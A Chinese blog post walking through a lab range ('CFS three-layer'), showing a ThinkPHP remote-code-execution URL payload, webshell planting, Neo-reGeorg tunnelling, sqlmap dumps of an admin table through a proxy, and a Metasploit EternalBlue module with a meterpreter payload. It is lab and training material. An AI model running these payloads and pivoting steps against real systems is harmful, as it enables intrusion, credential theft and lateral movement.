云尘靶场--CFS三层靶机

于 2024-02-22 17:17:59 发布
阅读量617 收藏 7
点赞数 11
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/136221410
版权

先扫c段

windows上好像挂着vpn nmap不能扫

直接fscan了

可以看到172.25.0.13存活  存在ftp、ssh、http等端口 漏洞也有了

先不急 访问一下网站

172.25.0.13

http://172.25.0.13/

直接拿thinkphp漏扫工具来扫一下

有poc可以直接利用

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

发现可以利用

用工具爽的很

用命令执行

可以看到

第一个flag

然后直接getshell拿下

检查一下看看

蚁剑连接成功了

 第二个flag

第三个flag

/www/wwwroot/ThinkPHP/public/flag21sA.txt

 然后先信息收集一波

查内核
uname -r
查ip
ifconfig
ip a
查端口
netstat -ntlp
查进程
ps -ef
查路由
route

翻翻目录、文件

ifconfig

 下面建立代理 很久没用不太熟练了

这里使用neo-regeorg

先上传tunnel.php到网站根目录

检查一下

然后建立sock5代理

neoreg.py -k a  -u http://172.25.0.13/tunnel.php

chmod 777 fscan_amd64

./fscan_amd64

 扫到192.168.22.22

192.168.22.22

 查看/robots.txt

根据提示可以找到登录界面http://192.168.22.22/index.php?r=admini/public/login

查看源代码看到有hint

1.数据库查询 

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch --dbs --proxy=socks5://127.0.0.1:1080

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch -D bagecms --tables  --proxy=socks5://127.0.0.1:1080

 

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin --columns  --proxy=socks5://127.0.0.1:1080

 

 

sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch -D bagecms -T bage_admin -C username,password --dump --proxy=socks5://127.0.0.1:1080

用爆出的账号密码登录

进去就得到flag

在模板里面插入一句话木马

 蚁剑设置代理sock5

尝试连接

 

flag{23ASfqwr4t2e} 

ifconfig

 

T1中上传neo

解压unzip Neo-reGeorg-5.1.0.zip

在192.168.22.22中上传tunnel.php

检查一下

可以先查看一下能不能用python 有没有python环境

然后开启代理

 python neoreg.py -k a -u http://192.168.22.22/tunnel.php -l 0.0.0.0 -p 2000

192.168.33.33

nmap扫描33网段 

proxychains4 nmap -Pn -sT 192.168.33.0/24

 发现这是开放着445、3389端口的Windows系统

那应该是永恒之蓝

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
options
run

 type查看flag.txt

木…
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
netlimiter-4.0.41.0
01-03
netlimiter 4是最新版本的带宽分享和控制工具,可以有效地控制服务器或者个人计算机的带宽分配和控制,同时还可以有效地查看上行和下载带宽,让你对服务器的带宽有所了解。
CFS内网穿透靶场实战
qq_59081708的博客
09-30 378
通过复现CFS三层穿透靶场,让我对漏洞的利用,各种工具的使用以及横向穿透技术有了更深的理解。一开始nmap探测ip端口,直接用thinkphpv5版本漏洞工具反弹shell,接着利用蚁剑对服务器直接进行控制,留下后门木马拿取服务器所有控制权限。在探测出有两个网卡后,继续对二号网卡进行渗透。这时候需要添加路由,修改socket,设置代理来接着对其展开渗透。利用御剑扫描目录,利用SQLmap脱库获取密码,拿下服务器权限后通过在其php文件中添加一句话木马又一次获取shell,添加木马后门。
云尘靶场-铁三域控
m0_64180167的博客
10-26 202
通过vpn链接 然后fscan扫描c段扫描出来三个ip存活 并且141存在永恒之蓝我们看看能不能直接复现按照原本的设置发现 提示这里需要通过32位来进行那我们开始设置然后我们开始利用利用失败 不知道于是我们开始看其他的吧 我们可以发现123 开放了 80端口去访问看看织梦cms 是有洞的首先不知道登录界面 我们开始扫目录这里sql文件我们去访问。
CFS三层内网靶场渗透
Cfoxer的博客
10-25 2479
使用搭载了VMnet1网卡的kali模拟攻击者从外网信息收集,得到网站信息,利用网站漏洞夺取外网服务器权限,又将失陷的外网服务器作为跳板机,通过代理的方式访问到了内网服务器,然后通过内网服务器网站的漏洞,再一次夺取权限并建立二次代理以后,到达内网办公环境,最后利用主机所存在的漏洞,获得内网主机权限的渗透流程。发现22网段存在设备2,ip地址为192.168.22.129,并且设备2,开启80端口,配置浏览器代理插件,使用浏览器访问查看。访问成功,设置socks5代理,然后使用蚁剑连接。
Acid靶场实战
m0_65149086的博客
05-04 355
云尘靶场,靶机渗透,Vulhnub,Acid
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1279
vulnhub靶机AI-Web-1.0渗透笔记
虚幻4-4.15.1版本-创建物体及子弹发射
04-07
表示自己学习过程,遇到的问题及解决
CFS三层靶机渗透记录
Beret-81的博客
03-08 2677
0x00 前言 这是 TeamsSix前辈出的一个三层内网渗透的靶场,偏向于CTF,但更类似于真实的渗透环境。通过一层一层的渗透,获取每个靶机的flag。 0x01 环境搭建 靶场获取:https://pan.baidu.com/s/1m3JoNfyxE-a96o7DMb1eLw 提取码:ht9o 靶场环境网络拓扑图: 导入虚拟机后,根据拓扑图进行网络配置或者自己设置。 targe1:172....
2019年安徽省大学生网络攻防赛赛前培训——Day1
落日领航员の技术栈
07-18 1657
2019安徽省大学生网络攻防赛方案 高职组(AWD模式) 实时防护 无差别攻击 一对多、多对一 分值不封顶 范围 web类、系统安全、数据安全、溢出等 时长 总计3小时,前0.5小时加固,后2.5小时混战 分值 每提交或者被提交flag即可获得或失去10分,基础分1000分,最低0分 排名 10%一等奖 20%二等奖 30%三等奖 40%优秀奖   本科组 初赛(线上赛) 时长 3小...
CFS三层靶机内网渗透
最新发布
AiENG_07的博客
12-05 618
方法二、直接通过正向代理工具neo-regroge建立socks通道,导入流量(无法使用icmp探测存活)上传tunnel文件,建立连接。登录后:重点关注上传(头像、文件、编辑器)、导出(文件、sql语句)、自定义模版(网站结构、默认页面更改),ssrf。查找当前cms的历史漏洞,若无历史漏洞,下下策为找源代码审计,大部分系统不开源故不存在代码审计过程;接下来就可以开始内网渗透了,现在忘掉配置是的网卡信息,IP信息,后台信息等等,开始全真模拟。搭建正向代理,不需要在对方服务器中额外开通端口,利用后端代码。
云尘靶场 --JIS-CTF-VulnUpload
2202_75317918的博客
11-08 142
直接访问一下,发现权限不够,这里我知道要提权了,但是不知道怎么操作。看到这个账号密码,很明显是ssh连接的密码了。抱着试一试的态度看一下admin_area。本来还以为密码要去爆破的,结果直接给了。那就先看一下robots.txt了。没想到源代码里面居然有 这么这么多。打开看看提示,说有flag.txt。先生成了一句话木马aaa.php。想到上次师兄给的哥斯拉试一下。我以为很麻烦,借鉴了师兄的wp。好的登录一下,文件上传漏洞。好吧没成功,那目录扫描一下。连接成功,找到flag了。到了/login.php。
内网渗透之CFS三层靶场渗透
yc11223344的博客
12-19 894
1.在连接target2的时候代理总是断开,反弹不了shell,后来重新启动msf,重新配置,最终获得了shell2.proxychains4使用不了sqlmap,不清楚什么原因。
【VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
【JIS-CTF靶场搭建及解题思路】
weixin_42266726的博客
09-27 809
JIS-CTF靶场测试
cfs靶场内网渗透
qq_48511129的博客
01-16 319
靶场WP https://mp.weixin.qq.com/s?__biz=MzkwNTI4MDI2OQ==&mid=2247485004&idx=1&sn=7f0622293317564b0efcecf75e8dacbc&chksm=c0fb682ef78ce138ce4d31b1f4ac806d2bc669c54d48043e37731818547877a4cb8354314771&mpshare=1&scene=23&srcid=0113l8aT
【VulHub靶场】之CFS三层靶机内网渗透
weixin_51519028的博客
10-21 1565
msf配置代理的实操
【续】CFS三层靶机中的Flag位置及其获取
TeamsSix 的 CSDN 空间
10-21 1732
0x00 前言 最近写了一篇《CFS三层靶机搭建及其内网渗透》的文章,里面满满的干货,本篇文章需要结合《CFS三层靶机搭建及其内网渗透》一起看,这篇文章可以在本文底部找到阅读链接。 0x01 Target1 1、系统根目录下 2、网站根目录下 3、网站robots.txt文件中 0x02 Target2 1、系统根目录下 2、日志文件中 3、passwd文件中 4、crontab文件中...
CFS三层网络环境靶场实战笔记
mingyqf的博客
02-25 407
看到targe2 拿到权限后 msf做bind_tcp(正向代理)陷入沉思考: 解决:子网掩码24 假设:target1:10.10.20.11 + 某公网 target2:10.10.20.22 10.10.30.22 target3: 10.10.30.33 要是还是用反向代理的后门木马,那么target3 找不到targe 1, 而用正向代理,因为已经拿到target2 权限,可以借助target2 正向 访问target3 。然后target3 就能顺理成章的返回shell 到我们的targe.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值